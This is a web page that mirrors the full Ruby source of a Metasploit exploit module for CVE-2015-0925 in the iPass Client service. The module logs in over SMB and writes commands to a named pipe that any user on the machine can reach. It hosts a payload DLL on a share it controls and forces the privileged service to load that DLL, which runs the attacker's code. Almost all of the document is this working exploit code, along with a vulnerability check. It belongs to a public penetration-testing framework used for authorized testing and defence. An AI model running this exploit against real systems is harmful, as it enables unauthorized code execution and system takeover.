Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ipass_pipe_exec.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::SMB::Client::Authenticated
10
include Msf::Exploit::Remote::SMB::Server::Share
11
include Msf::Exploit::EXE
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'IPass Control Pipe Remote Command Execution',
18
'Description' => %q{
19
This module exploits a vulnerability in the IPass Client service. This service provides a
20
named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
21
to force the service to load a DLL from a SMB share.
22
},
23
'Author' => [
24
'Matthias Kaiser', # Vulnerability discovery
25
'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
26
],
27
'License' => MSF_LICENSE,
28
'References' => [
29
[ 'CVE', '2015-0925' ],
30
[ 'OSVDB', '117423' ],
31
[ 'BID', '72265' ],
32
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
33
],
34
'DefaultOptions' => {
35
'EXITFUNC' => 'process',
36
},
37
'Payload' => {
38
'Space' => 2048,
39
'DisableNops' => true
40
},
41
'Platform' => 'win',
42
'Targets' => [
43
[ 'Windows x32', { 'Arch' => ARCH_X86 } ],
44
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
45
],
46
'Privileged' => true,
47
'DisclosureDate' => '2015-01-21',
48
'DefaultTarget' => 0,
49
'Notes' => {
50
'Reliability' => UNKNOWN_RELIABILITY,
51
'Stability' => UNKNOWN_STABILITY,
52
'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
}
54
)
55
)
56
57
register_options(
58
[
59
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
60
]
61
)
62
63
deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
64
end
65
66
def check
67
echo_value = rand_text_alphanumeric(rand(10) + 10)
68
69
begin
70
response = send_command("System.Echo #{echo_value}")
71
if response =~ Regexp.new(echo_value)
72
return Exploit::CheckCode::Vulnerable
73
else
74
return Exploit::CheckCode::Unknown
75
end
76
rescue Rex::ConnectionError => e
77
vprint_error("Connection failed: #{e.class}: #{e}")
78
return Msf::Exploit::CheckCode::Unknown
79
rescue Rex::Proto::SMB::Exceptions::LoginError => e
80
vprint_error("Error during login: #{e}")
81
return Msf::Exploit::CheckCode::Unknown
82
rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e
83
vprint_error(e.to_s)
84
return Msf::Exploit::CheckCode::Unknown
85
end
86
end
87
88
def setup
89
super
90
self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
91
self.share = Rex::Text.rand_text_alpha(5)
92
end
93
94
def primer
95
self.file_contents = generate_payload_dll
96
print_status("File available on #{unc}...")
97
send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
98
end
99
100
def send_command(command)
101
# The connection is closed after each command, so we have to reopen it
102
connect
103
smb_login
104
pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
105
pipe.write(Rex::Text.to_unicode(command))
106
response = Rex::Text.to_ascii(pipe.read)
107
108
response
109
end
110
111
def exploit
112
begin
113
Timeout.timeout(datastore['SMB_DELAY']) { super }
114
rescue Timeout::Error
115
# do nothing... just finish exploit and stop smb server...
116
end
117
end
118
end
119
120